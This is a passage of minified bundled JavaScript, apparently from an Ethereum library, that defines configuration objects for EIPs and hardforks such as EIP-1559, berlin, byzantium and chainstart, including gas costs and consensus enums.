            4013: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-1559",
                    number: 1559,
                    comment: "Fee market change for ETH 1.0 chain",
                    url: "https://eips.ethereum.org/EIPS/eip-1559",
                    status: "Final",
                    minimumHardfork: "berlin",
                    requiredEIPs: [
                        2930
                    ],
                    gasConfig: {
                        baseFeeMaxChangeDenominator: {
                            v: 8,
                            d: "Maximum base fee change denominator"
                        },
                        elasticityMultiplier: {
                            v: 2,
                            d: "Maximum block gas target elasticity"
                        },
                        initialBaseFee: {
                            v: 1e9,
                            d: "Initial base fee on first EIP1559 block"
                        }
                    },
                    gasPrices: {},
                    vm: {},
                    pow: {}
                };
            },
            1933: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-2315",
                    number: 2315,
                    comment: "Simple subroutines for the EVM",
                    url: "https://eips.ethereum.org/EIPS/eip-2315",
                    status: "Draft",
                    minimumHardfork: "istanbul",
                    gasConfig: {},
                    gasPrices: {
                        beginsub: {
                            v: 2,
                            d: "Base fee of the BEGINSUB opcode"
                        },
                        returnsub: {
                            v: 5,
                            d: "Base fee of the RETURNSUB opcode"
                        },
                        jumpsub: {
                            v: 10,
                            d: "Base fee of the JUMPSUB opcode"
                        }
                    },
                    vm: {},
                    pow: {}
                };
            },
            4638: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-2537",
                    number: 2537,
                    comment: "BLS12-381 precompiles",
                    url: "https://eips.ethereum.org/EIPS/eip-2537",
                    status: "Draft",
                    minimumHardfork: "chainstart",
                    gasConfig: {},
                    gasPrices: {
                        Bls12381G1AddGas: {
                            v: 600,
                            d: "Gas cost of a single BLS12-381 G1 addition precompile-call"
                        },
                        Bls12381G1MulGas: {
                            v: 12e3,
                            d: "Gas cost of a single BLS12-381 G1 multiplication precompile-call"
                        },
                        Bls12381G2AddGas: {
                            v: 4500,
                            d: "Gas cost of a single BLS12-381 G2 addition precompile-call"
                        },
                        Bls12381G2MulGas: {
                            v: 55e3,
                            d: "Gas cost of a single BLS12-381 G2 multiplication precompile-call"
                        },
                        Bls12381PairingBaseGas: {
                            v: 115e3,
                            d: "Base gas cost of BLS12-381 pairing check"
                        },
                        Bls12381PairingPerPairGas: {
                            v: 23e3,
                            d: "Per-pair gas cost of BLS12-381 pairing check"
                        },
                        Bls12381MapG1Gas: {
                            v: 5500,
                            d: "Gas cost of BLS12-381 map field element to G1"
                        },
                        Bls12381MapG2Gas: {
                            v: 11e4,
                            d: "Gas cost of BLS12-381 map field element to G2"
                        },
                        Bls12381MultiExpGasDiscount: {
                            v: [
                                [
                                    1,
                                    1200
                                ],
                                [
                                    2,
                                    888
                                ],
                                [
                                    3,
                                    764
                                ],
                                [
                                    4,
                                    641
                                ],
                                [
                                    5,
                                    594
                                ],
                                [
                                    6,
                                    547
                                ],
                                [
                                    7,
                                    500
                                ],
                                [
                                    8,
                                    453
                                ],
                                [
                                    9,
                                    438
                                ],
                                [
                                    10,
                                    423
                                ],
                                [
                                    11,
                                    408
                                ],
                                [
                                    12,
                                    394
                                ],
                                [
                                    13,
                                    379
                                ],
                                [
                                    14,
                                    364
                                ],
                                [
                                    15,
                                    349
                                ],
                                [
                                    16,
                                    334
                                ],
                                [
                                    17,
                                    330
                                ],
                                [
                                    18,
                                    326
                                ],
                                [
                                    19,
                                    322
                                ],
                                [
                                    20,
                                    318
                                ],
                                [
                                    21,
                                    314
                                ],
                                [
                                    22,
                                    310
                                ],
                                [
                                    23,
                                    306
                                ],
                                [
                                    24,
                                    302
                                ],
                                [
                                    25,
                                    298
                                ],
                                [
                                    26,
                                    294
                                ],
                                [
                                    27,
                                    289
                                ],
                                [
                                    28,
                                    285
                                ],
                                [
                                    29,
                                    281
                                ],
                                [
                                    30,
                                    277
                                ],
                                [
                                    31,
                                    273
                                ],
                                [
                                    32,
                                    269
                                ],
                                [
                                    33,
                                    268
                                ],
                                [
                                    34,
                                    266
                                ],
                                [
                                    35,
                                    265
                                ],
                                [
                                    36,
                                    263
                                ],
                                [
                                    37,
                                    262
                                ],
                                [
                                    38,
                                    260
                                ],
                                [
                                    39,
                                    259
                                ],
                                [
                                    40,
                                    257
                                ],
                                [
                                    41,
                                    256
                                ],
                                [
                                    42,
                                    254
                                ],
                                [
                                    43,
                                    253
                                ],
                                [
                                    44,
                                    251
                                ],
                                [
                                    45,
                                    250
                                ],
                                [
                                    46,
                                    248
                                ],
                                [
                                    47,
                                    247
                                ],
                                [
                                    48,
                                    245
                                ],
                                [
                                    49,
                                    244
                                ],
                                [
                                    50,
                                    242
                                ],
                                [
                                    51,
                                    241
                                ],
                                [
                                    52,
                                    239
                                ],
                                [
                                    53,
                                    238
                                ],
                                [
                                    54,
                                    236
                                ],
                                [
                                    55,
                                    235
                                ],
                                [
                                    56,
                                    233
                                ],
                                [
                                    57,
                                    232
                                ],
                                [
                                    58,
                                    231
                                ],
                                [
                                    59,
                                    229
                                ],
                                [
                                    60,
                                    228
                                ],
                                [
                                    61,
                                    226
                                ],
                                [
                                    62,
                                    225
                                ],
                                [
                                    63,
                                    223
                                ],
                                [
                                    64,
                                    222
                                ],
                                [
                                    65,
                                    221
                                ],
                                [
                                    66,
                                    220
                                ],
                                [
                                    67,
                                    219
                                ],
                                [
                                    68,
                                    219
                                ],
                                [
                                    69,
                                    218
                                ],
                                [
                                    70,
                                    217
                                ],
                                [
                                    71,
                                    216
                                ],
                                [
                                    72,
                                    216
                                ],
                                [
                                    73,
                                    215
                                ],
                                [
                                    74,
                                    214
                                ],
                                [
                                    75,
                                    213
                                ],
                                [
                                    76,
                                    213
                                ],
                                [
                                    77,
                                    212
                                ],
                                [
                                    78,
                                    211
                                ],
                                [
                                    79,
                                    211
                                ],
                                [
                                    80,
                                    210
                                ],
                                [
                                    81,
                                    209
                                ],
                                [
                                    82,
                                    208
                                ],
                                [
                                    83,
                                    208
                                ],
                                [
                                    84,
                                    207
                                ],
                                [
                                    85,
                                    206
                                ],
                                [
                                    86,
                                    205
                                ],
                                [
                                    87,
                                    205
                                ],
                                [
                                    88,
                                    204
                                ],
                                [
                                    89,
                                    203
                                ],
                                [
                                    90,
                                    202
                                ],
                                [
                                    91,
                                    202
                                ],
                                [
                                    92,
                                    201
                                ],
                                [
                                    93,
                                    200
                                ],
                                [
                                    94,
                                    199
                                ],
                                [
                                    95,
                                    199
                                ],
                                [
                                    96,
                                    198
                                ],
                                [
                                    97,
                                    197
                                ],
                                [
                                    98,
                                    196
                                ],
                                [
                                    99,
                                    196
                                ],
                                [
                                    100,
                                    195
                                ],
                                [
                                    101,
                                    194
                                ],
                                [
                                    102,
                                    193
                                ],
                                [
                                    103,
                                    193
                                ],
                                [
                                    104,
                                    192
                                ],
                                [
                                    105,
                                    191
                                ],
                                [
                                    106,
                                    191
                                ],
                                [
                                    107,
                                    190
                                ],
                                [
                                    108,
                                    189
                                ],
                                [
                                    109,
                                    188
                                ],
                                [
                                    110,
                                    188
                                ],
                                [
                                    111,
                                    187
                                ],
                                [
                                    112,
                                    186
                                ],
                                [
                                    113,
                                    185
                                ],
                                [
                                    114,
                                    185
                                ],
                                [
                                    115,
                                    184
                                ],
                                [
                                    116,
                                    183
                                ],
                                [
                                    117,
                                    182
                                ],
                                [
                                    118,
                                    182
                                ],
                                [
                                    119,
                                    181
                                ],
                                [
                                    120,
                                    180
                                ],
                                [
                                    121,
                                    179
                                ],
                                [
                                    122,
                                    179
                                ],
                                [
                                    123,
                                    178
                                ],
                                [
                                    124,
                                    177
                                ],
                                [
                                    125,
                                    176
                                ],
                                [
                                    126,
                                    176
                                ],
                                [
                                    127,
                                    175
                                ],
                                [
                                    128,
                                    174
                                ]
                            ],
                            d: "Discount gas costs of calls to the MultiExp precompiles with `k` (point, scalar) pair"
                        }
                    },
                    vm: {},
                    pow: {}
                };
            },
            6906: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-2565",
                    number: 2565,
                    comment: "ModExp gas cost",
                    url: "https://eips.ethereum.org/EIPS/eip-2565",
                    status: "Final",
                    minimumHardfork: "byzantium",
                    gasConfig: {},
                    gasPrices: {
                        modexpGquaddivisor: {
                            v: 3,
                            d: "Gquaddivisor from modexp precompile for gas calculation"
                        }
                    },
                    vm: {},
                    pow: {}
                };
            },
            3399: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-2718",
                    comment: "Typed Transaction Envelope",
                    url: "https://eips.ethereum.org/EIPS/eip-2718",
                    status: "Final",
                    minimumHardfork: "chainstart",
                    gasConfig: {},
                    gasPrices: {},
                    vm: {},
                    pow: {}
                };
            },
            7387: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-2929",
                    comment: "Gas cost increases for state access opcodes",
                    url: "https://eips.ethereum.org/EIPS/eip-2929",
                    status: "Final",
                    minimumHardfork: "chainstart",
                    gasConfig: {},
                    gasPrices: {
                        coldsload: {
                            v: 2100,
                            d: "Gas cost of the first read of storage from a given location (per transaction)"
                        },
                        coldaccountaccess: {
                            v: 2600,
                            d: "Gas cost of the first read of a given address (per transaction)"
                        },
                        warmstorageread: {
                            v: 100,
                            d: "Gas cost of reading storage locations which have already loaded 'cold'"
                        },
                        sstoreCleanGasEIP2200: {
                            v: 2900,
                            d: "Once per SSTORE operation from clean non-zero to something else"
                        },
                        sstoreNoopGasEIP2200: {
                            v: 100,
                            d: "Once per SSTORE operation if the value doesn't change"
                        },
                        sstoreDirtyGasEIP2200: {
                            v: 100,
                            d: "Once per SSTORE operation if a dirty value is changed"
                        },
                        sstoreInitRefundEIP2200: {
                            v: 19900,
                            d: "Once per SSTORE operation for resetting to the original zero value"
                        },
                        sstoreCleanRefundEIP2200: {
                            v: 4900,
                            d: "Once per SSTORE operation for resetting to the original non-zero value"
                        },
                        call: {
                            v: 0,
                            d: "Base fee of the CALL opcode"
                        },
                        callcode: {
                            v: 0,
                            d: "Base fee of the CALLCODE opcode"
                        },
                        delegatecall: {
                            v: 0,
                            d: "Base fee of the DELEGATECALL opcode"
                        },
                        staticcall: {
                            v: 0,
                            d: "Base fee of the STATICCALL opcode"
                        },
                        balance: {
                            v: 0,
                            d: "Base fee of the BALANCE opcode"
                        },
                        extcodesize: {
                            v: 0,
                            d: "Base fee of the EXTCODESIZE opcode"
                        },
                        extcodecopy: {
                            v: 0,
                            d: "Base fee of the EXTCODECOPY opcode"
                        },
                        extcodehash: {
                            v: 0,
                            d: "Base fee of the EXTCODEHASH opcode"
                        },
                        sload: {
                            v: 0,
                            d: "Base fee of the SLOAD opcode"
                        },
                        sstore: {
                            v: 0,
                            d: "Base fee of the SSTORE opcode"
                        }
                    },
                    vm: {},
                    pow: {}
                };
            },
            6299: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-2930",
                    comment: "Optional access lists",
                    url: "https://eips.ethereum.org/EIPS/eip-2930",
                    status: "Final",
                    minimumHardfork: "istanbul",
                    requiredEIPs: [
                        2718,
                        2929
                    ],
                    gasConfig: {},
                    gasPrices: {
                        accessListStorageKeyCost: {
                            v: 1900,
                            d: "Gas cost per storage key in an Access List transaction"
                        },
                        accessListAddressCost: {
                            v: 2400,
                            d: "Gas cost per storage key in an Access List transaction"
                        }
                    },
                    vm: {},
                    pow: {}
                };
            },
            1073: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-3198",
                    number: 3198,
                    comment: "BASEFEE opcode",
                    url: "https://eips.ethereum.org/EIPS/eip-3198",
                    status: "Final",
                    minimumHardfork: "london",
                    gasConfig: {},
                    gasPrices: {
                        basefee: {
                            v: 2,
                            d: "Gas cost of the BASEFEE opcode"
                        }
                    },
                    vm: {},
                    pow: {}
                };
            },
            634: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-3529",
                    comment: "Reduction in refunds",
                    url: "https://eips.ethereum.org/EIPS/eip-3529",
                    status: "Final",
                    minimumHardfork: "berlin",
                    requiredEIPs: [
                        2929
                    ],
                    gasConfig: {
                        maxRefundQuotient: {
                            v: 5,
                            d: "Maximum refund quotient; max tx refund is min(tx.gasUsed/maxRefundQuotient, tx.gasRefund)"
                        }
                    },
                    gasPrices: {
                        selfdestructRefund: {
                            v: 0,
                            d: "Refunded following a selfdestruct operation"
                        },
                        sstoreClearRefundEIP2200: {
                            v: 4800,
                            d: "Once per SSTORE operation for clearing an originally existing storage slot"
                        }
                    },
                    vm: {},
                    pow: {}
                };
            },
            3829: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-3540",
                    number: 3540,
                    comment: "EVM Object Format (EOF) v1",
                    url: "https://eips.ethereum.org/EIPS/eip-3540",
                    status: "Review",
                    minimumHardfork: "london",
                    requiredEIPs: [
                        3541
                    ],
                    gasConfig: {},
                    gasPrices: {},
                    vm: {},
                    pow: {}
                };
            },
            5729: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-3541",
                    comment: "Reject new contracts starting with the 0xEF byte",
                    url: "https://eips.ethereum.org/EIPS/eip-3541",
                    status: "Final",
                    minimumHardfork: "berlin",
                    requiredEIPs: [],
                    gasConfig: {},
                    gasPrices: {},
                    vm: {},
                    pow: {}
                };
            },
            8958: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-3554",
                    comment: "Reduction in refunds",
                    url: "Difficulty Bomb Delay to December 1st 2021",
                    status: "Final",
                    minimumHardfork: "muirGlacier",
                    requiredEIPs: [],
                    gasConfig: {},
                    gasPrices: {},
                    vm: {},
                    pow: {
                        difficultyBombDelay: {
                            v: 95e5,
                            d: "the amount of blocks to delay the difficulty bomb with"
                        }
                    }
                };
            },
            8334: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-3607",
                    number: 3607,
                    comment: "Reject transactions from senders with deployed code",
                    url: "https://eips.ethereum.org/EIPS/eip-3607",
                    status: "Final",
                    minimumHardfork: "chainstart",
                    requiredEIPs: [],
                    gasConfig: {},
                    gasPrices: {},
                    vm: {},
                    pow: {}
                };
            },
            3412: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-3651",
                    number: 3198,
                    comment: "Warm COINBASE",
                    url: "https://eips.ethereum.org/EIPS/eip-3651",
                    status: "Review",
                    minimumHardfork: "london",
                    requiredEIPs: [
                        2929
                    ],
                    gasConfig: {},
                    gasPrices: {},
                    vm: {},
                    pow: {}
                };
            },
            6337: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-3670",
                    number: 3670,
                    comment: "EOF - Code Validation",
                    url: "https://eips.ethereum.org/EIPS/eip-3670",
                    status: "Review",
                    minimumHardfork: "london",
                    requiredEIPs: [
                        3540
                    ],
                    gasConfig: {},
                    gasPrices: {},
                    vm: {},
                    pow: {}
                };
            },
            2610: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-3675",
                    number: 3675,
                    comment: "Upgrade consensus to Proof-of-Stake",
                    url: "https://eips.ethereum.org/EIPS/eip-3675",
                    status: "Final",
                    minimumHardfork: "london",
                    requiredEIPs: [],
                    gasConfig: {},
                    gasPrices: {},
                    vm: {},
                    pow: {}
                };
            },
            7619: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-3855",
                    number: 3855,
                    comment: "PUSH0 instruction",
                    url: "https://eips.ethereum.org/EIPS/eip-3855",
                    status: "Review",
                    minimumHardfork: "chainstart",
                    requiredEIPs: [],
                    gasConfig: {},
                    gasPrices: {
                        push0: {
                            v: 2,
                            d: "Base fee of the PUSH0 opcode"
                        }
                    },
                    vm: {},
                    pow: {}
                };
            },
            8018: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-3860",
                    number: 3860,
                    comment: "Limit and meter initcode",
                    url: "https://eips.ethereum.org/EIPS/eip-3860",
                    status: "Review",
                    minimumHardfork: "spuriousDragon",
                    requiredEIPs: [],
                    gasConfig: {},
                    gasPrices: {
                        initCodeWordCost: {
                            v: 2,
                            d: "Gas to pay for each word (32 bytes) of initcode when creating a contract"
                        }
                    },
                    vm: {
                        maxInitCodeSize: {
                            v: 49152,
                            d: "Maximum length of initialization code when creating a contract"
                        }
                    },
                    pow: {}
                };
            },
            6779: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-4345",
                    number: 4345,
                    comment: "Difficulty Bomb Delay to June 2022",
                    url: "https://eips.ethereum.org/EIPS/eip-4345",
                    status: "Final",
                    minimumHardfork: "london",
                    gasConfig: {},
                    gasPrices: {},
                    vm: {},
                    pow: {
                        difficultyBombDelay: {
                            v: 107e5,
                            d: "the amount of blocks to delay the difficulty bomb with"
                        }
                    }
                };
            },
            623: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-4399",
                    number: 4399,
                    comment: "Supplant DIFFICULTY opcode with PREVRANDAO",
                    url: "https://eips.ethereum.org/EIPS/eip-4399",
                    status: "Review",
                    minimumHardfork: "london",
                    requiredEIPs: [],
                    gasConfig: {},
                    gasPrices: {},
                    vm: {},
                    pow: {}
                };
            },
            797: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "EIP-5133",
                    number: 5133,
                    comment: "Delaying Difficulty Bomb to mid-September 2022",
                    url: "https://eips.ethereum.org/EIPS/eip-5133",
                    status: "Draft",
                    minimumHardfork: "grayGlacier",
                    gasConfig: {},
                    gasPrices: {},
                    vm: {},
                    pow: {
                        difficultyBombDelay: {
                            v: 114e5,
                            d: "the amount of blocks to delay the difficulty bomb with"
                        }
                    }
                };
            },
            5257: function(e, t, r) {
                "use strict";
                var n = this && this.__importDefault || function(e) {
                    return e && e.__esModule ? e : {
                        default: e
                    };
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.EIPs = void 0;
                const i = n(r(2819)), o = n(r(4013)), s = n(r(1933)), a = n(r(4638)), u = n(r(6906)), c = n(r(3399)), l = n(r(7387)), d = n(r(6299)), h = n(r(1073)), f = n(r(634)), p = n(r(3829)), m = n(r(5729)), g = n(r(8958)), y = n(r(8334)), v = n(r(3412)), b = n(r(6337)), E = n(r(2610)), A = n(r(7619)), _ = n(r(8018)), w = n(r(6779)), T = n(r(623)), R = n(r(797));
                t.EIPs = {
                    1153: i.default,
                    1559: o.default,
                    2315: s.default,
                    2537: a.default,
                    2565: u.default,
                    2718: c.default,
                    2929: l.default,
                    2930: d.default,
                    3198: h.default,
                    3529: f.default,
                    3540: p.default,
                    3541: m.default,
                    3554: g.default,
                    3607: y.default,
                    3651: v.default,
                    3670: b.default,
                    3675: E.default,
                    3855: A.default,
                    3860: _.default,
                    4345: w.default,
                    4399: T.default,
                    5133: R.default
                };
            },
            4443: (e, t)=>{
                "use strict";
                var r, n, i, o, s;
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.CustomChain = t.ConsensusAlgorithm = t.ConsensusType = t.Hardfork = t.Chain = void 0, (s = t.Chain || (t.Chain = {}))[s.Mainnet = 1] = "Mainnet", s[s.Goerli = 5] = "Goerli", s[s.Sepolia = 11155111] = "Sepolia", (o = t.Hardfork || (t.Hardfork = {})).Chainstart = "chainstart", o.Homestead = "homestead", o.Dao = "dao", o.TangerineWhistle = "tangerineWhistle", o.SpuriousDragon = "spuriousDragon", o.Byzantium = "byzantium", o.Constantinople = "constantinople", o.Petersburg = "petersburg", o.Istanbul = "istanbul", o.MuirGlacier = "muirGlacier", o.Berlin = "berlin", o.London = "london", o.ArrowGlacier = "arrowGlacier", o.GrayGlacier = "grayGlacier", o.MergeForkIdTransition = "mergeForkIdTransition", o.Merge = "merge", o.Shanghai = "shanghai", o.ShardingForkDev = "shardingFork", (i = t.ConsensusType || (t.ConsensusType = {})).ProofOfStake = "pos", i.ProofOfWork = "pow", i.ProofOfAuthority = "poa", (n = t.ConsensusAlgorithm || (t.ConsensusAlgorithm = {})).Ethash = "ethash", n.Clique = "clique", n.Casper = "casper", (r = t.CustomChain || (t.CustomChain = {})).PolygonMainnet = "polygon-mainnet", r.PolygonMumbai = "polygon-mumbai", r.ArbitrumRinkebyTestnet = "arbitrum-rinkeby-testnet", r.ArbitrumOne = "arbitrum-one", r.xDaiChain = "x-dai-chain", r.OptimisticKovan = "optimistic-kovan", r.OptimisticEthereum = "optimistic-ethereum";
            },
            3923: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "arrowGlacier",
                    comment: "HF to delay the difficulty bomb",
                    url: "https://github.com/ethereum/execution-specs/blob/master/network-upgrades/mainnet-upgrades/arrow-glacier.md",
                    status: "Final",
                    eips: [
                        4345
                    ],
                    gasConfig: {},
                    gasPrices: {},
                    vm: {},
                    pow: {}
                };
            },
            9126: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "berlin",
                    comment: "HF targeted for July 2020 following the Muir Glacier HF",
                    url: "https://eips.ethereum.org/EIPS/eip-2070",
                    status: "Final",
                    eips: [
                        2565,
                        2929,
                        2718,
                        2930
                    ]
                };
            },
            7251: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "byzantium",
                    comment: "Hardfork with new precompiles, instructions and other protocol changes",
                    url: "https://eips.ethereum.org/EIPS/eip-609",
                    status: "Final",
                    gasConfig: {},
                    gasPrices: {
                        modexpGquaddivisor: {
                            v: 20,
                            d: "Gquaddivisor from modexp precompile for gas calculation"
                        },
                        ecAdd: {
                            v: 500,
                            d: "Gas costs for curve addition precompile"
                        },
                        ecMul: {
                            v: 4e4,
                            d: "Gas costs for curve multiplication precompile"
                        },
                        ecPairing: {
                            v: 1e5,
                            d: "Base gas costs for curve pairing precompile"
                        },
                        ecPairingWord: {
                            v: 8e4,
                            d: "Gas costs regarding curve pairing precompile input length"
                        },
                        revert: {
                            v: 0,
                            d: "Base fee of the REVERT opcode"
                        },
                        staticcall: {
                            v: 700,
                            d: "Base fee of the STATICCALL opcode"
                        },
                        returndatasize: {
                            v: 2,
                            d: "Base fee of the RETURNDATASIZE opcode"
                        },
                        returndatacopy: {
                            v: 3,
                            d: "Base fee of the RETURNDATACOPY opcode"
                        }
                    },
                    vm: {},
                    pow: {
                        minerReward: {
                            v: "3000000000000000000",
                            d: "the amount a miner get rewarded for mining a block"
                        },
                        difficultyBombDelay: {
                            v: 3e6,
                            d: "the amount of blocks to delay the difficulty bomb with"
                        }
                    }
                };
            },
            9454: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "chainstart",
                    comment: "Start of the Ethereum main chain",
                    url: "",
                    status: "",
                    gasConfig: {
                        minGasLimit: {
                            v: 5e3,
                            d: "Minimum the gas limit may ever be"
                        },
                        gasLimitBoundDivisor: {
                            v: 1024,
                            d: "The bound divisor of the gas limit, used in update calculations"
                        },
                        maxRefundQuotient: {
                            v: 2,
                            d: "Maximum refund quotient; max tx refund is min(tx.gasUsed/maxRefundQuotient, tx.gasRefund)"
                        }
                    },
                    gasPrices: {
                        base: {
                            v: 2,
                            d: "Gas base cost, used e.g. for ChainID opcode (Istanbul)"
                        },
                        tierStep: {
                            v: [
                                0,
                                2,
                                3,
                                5,
                                8,
                                10,
                                20
                            ],
                            d: "Once per operation, for a selection of them"
                        },
                        exp: {
                            v: 10,
                            d: "Base fee of the EXP opcode"
                        },
                        expByte: {
                            v: 10,
                            d: "Times ceil(log256(exponent)) for the EXP instruction"
                        },
                        sha3: {
                            v: 30,
                            d: "Base fee of the SHA3 opcode"
                        },
                        sha3Word: {
                            v: 6,
                            d: "Once per word of the SHA3 operation's data"
                        },
                        sload: {
                            v: 50,
                            d: "Base fee of the SLOAD opcode"
                        },
                        sstoreSet: {
                            v: 2e4,
                            d: "Once per SSTORE operation if the zeroness changes from zero"
                        },
                        sstoreReset: {
                            v: 5e3,
                            d: "Once per SSTORE operation if the zeroness does not change from zero"
                        },
                        sstoreRefund: {
                            v: 15e3,
                            d: "Once per SSTORE operation if the zeroness changes to zero"
                        },
                        jumpdest: {
                            v: 1,
                            d: "Base fee of the JUMPDEST opcode"
                        },
                        log: {
                            v: 375,
                            d: "Base fee of the LOG opcode"
                        },
                        logData: {
                            v: 8,
                            d: "Per byte in a LOG* operation's data"
                        },
                        logTopic: {
                            v: 375,
                            d: "Multiplied by the * of the LOG*, per LOG transaction. e.g. LOG0 incurs 0 * c_txLogTopicGas, LOG4 incurs 4 * c_txLogTopicGas"
                        },
                        create: {
                            v: 32e3,
                            d: "Base fee of the CREATE opcode"
                        },
                        call: {
                            v: 40,
                            d: "Base fee of the CALL opcode"
                        },
                        callStipend: {
                            v: 2300,
                            d: "Free gas given at beginning of call"
                        },
                        callValueTransfer: {
                            v: 9e3,
                            d: "Paid for CALL when the value transfor is non-zero"
                        },
                        callNewAccount: {
                            v: 25e3,
                            d: "Paid for CALL when the destination address didn't exist prior"
                        },
                        selfdestructRefund: {
                            v: 24e3,
                            d: "Refunded following a selfdestruct operation"
                        },
                        memory: {
                            v: 3,
                            d: "Times the address of the (highest referenced byte in memory + 1). NOTE: referencing happens on read, write and in instructions such as RETURN and CALL"
                        },
                        quadCoeffDiv: {
                            v: 512,
                            d: "Divisor for the quadratic particle of the memory cost equation"
                        },
                        createData: {
                            v: 200,
                            d: ""
                        },
                        tx: {
                            v: 21e3,
                            d: "Per transaction. NOTE: Not payable on data of calls between transactions"
                        },
                        txCreation: {
                            v: 32e3,
                            d: "The cost of creating a contract via tx"
                        },
                        txDataZero: {
                            v: 4,
                            d: "Per byte of data attached to a transaction that equals zero. NOTE: Not payable on data of calls between transactions"
                        },
                        txDataNonZero: {
                            v: 68,
                            d: "Per byte of data attached to a transaction that is not equal to zero. NOTE: Not payable on data of calls between transactions"
                        },
                        copy: {
                            v: 3,
                            d: "Multiplied by the number of 32-byte words that are copied (round up) for any *COPY operation and added"
                        },
                        ecRecover: {
                            v: 3e3,
                            d: ""
                        },
                        sha256: {
                            v: 60,
                            d: ""
                        },
                        sha256Word: {
                            v: 12,
                            d: ""
                        },
                        ripemd160: {
                            v: 600,
                            d: ""
                        },
                        ripemd160Word: {
                            v: 120,
                            d: ""
                        },
                        identity: {
                            v: 15,
                            d: ""
                        },
                        identityWord: {
                            v: 3,
                            d: ""
                        },
                        stop: {
                            v: 0,
                            d: "Base fee of the STOP opcode"
                        },
                        add: {
                            v: 3,
                            d: "Base fee of the ADD opcode"
                        },
                        mul: {
                            v: 5,
                            d: "Base fee of the MUL opcode"
                        },
                        sub: {
                            v: 3,
                            d: "Base fee of the SUB opcode"
                        },
                        div: {
                            v: 5,
                            d: "Base fee of the DIV opcode"
                        },
                        sdiv: {
                            v: 5,
                            d: "Base fee of the SDIV opcode"
                        },
                        mod: {
                            v: 5,
                            d: "Base fee of the MOD opcode"
                        },
                        smod: {
                            v: 5,
                            d: "Base fee of the SMOD opcode"
                        },
                        addmod: {
                            v: 8,
                            d: "Base fee of the ADDMOD opcode"
                        },
                        mulmod: {
                            v: 8,
                            d: "Base fee of the MULMOD opcode"
                        },
                        signextend: {
                            v: 5,
                            d: "Base fee of the SIGNEXTEND opcode"
                        },
                        lt: {
                            v: 3,
                            d: "Base fee of the LT opcode"
                        },
                        gt: {
                            v: 3,
                            d: "Base fee of the GT opcode"
                        },
                        slt: {
                            v: 3,
                            d: "Base fee of the SLT opcode"
                        },
                        sgt: {
                            v: 3,
                            d: "Base fee of the SGT opcode"
                        },
                        eq: {
                            v: 3,
                            d: "Base fee of the EQ opcode"
                        },
                        iszero: {
                            v: 3,
                            d: "Base fee of the ISZERO opcode"
                        },
                        and: {
                            v: 3,
                            d: "Base fee of the AND opcode"
                        },
                        or: {
                            v: 3,
                            d: "Base fee of the OR opcode"
                        },
                        xor: {
                            v: 3,
                            d: "Base fee of the XOR opcode"
                        },
                        not: {
                            v: 3,
                            d: "Base fee of the NOT opcode"
                        },
                        byte: {
                            v: 3,
                            d: "Base fee of the BYTE opcode"
                        },
                        address: {
                            v: 2,
                            d: "Base fee of the ADDRESS opcode"
                        },
                        balance: {
                            v: 20,
                            d: "Base fee of the BALANCE opcode"
                        },
                        origin: {
                            v: 2,
                            d: "Base fee of the ORIGIN opcode"
                        },
                        caller: {
                            v: 2,
                            d: "Base fee of the CALLER opcode"
                        },
                        callvalue: {
                            v: 2,
                            d: "Base fee of the CALLVALUE opcode"
                        },
                        calldataload: {
                            v: 3,
                            d: "Base fee of the CALLDATALOAD opcode"
                        },
                        calldatasize: {
                            v: 2,
                            d: "Base fee of the CALLDATASIZE opcode"
                        },
                        calldatacopy: {
                            v: 3,
                            d: "Base fee of the CALLDATACOPY opcode"
                        },
                        codesize: {
                            v: 2,
                            d: "Base fee of the CODESIZE opcode"
                        },
                        codecopy: {
                            v: 3,
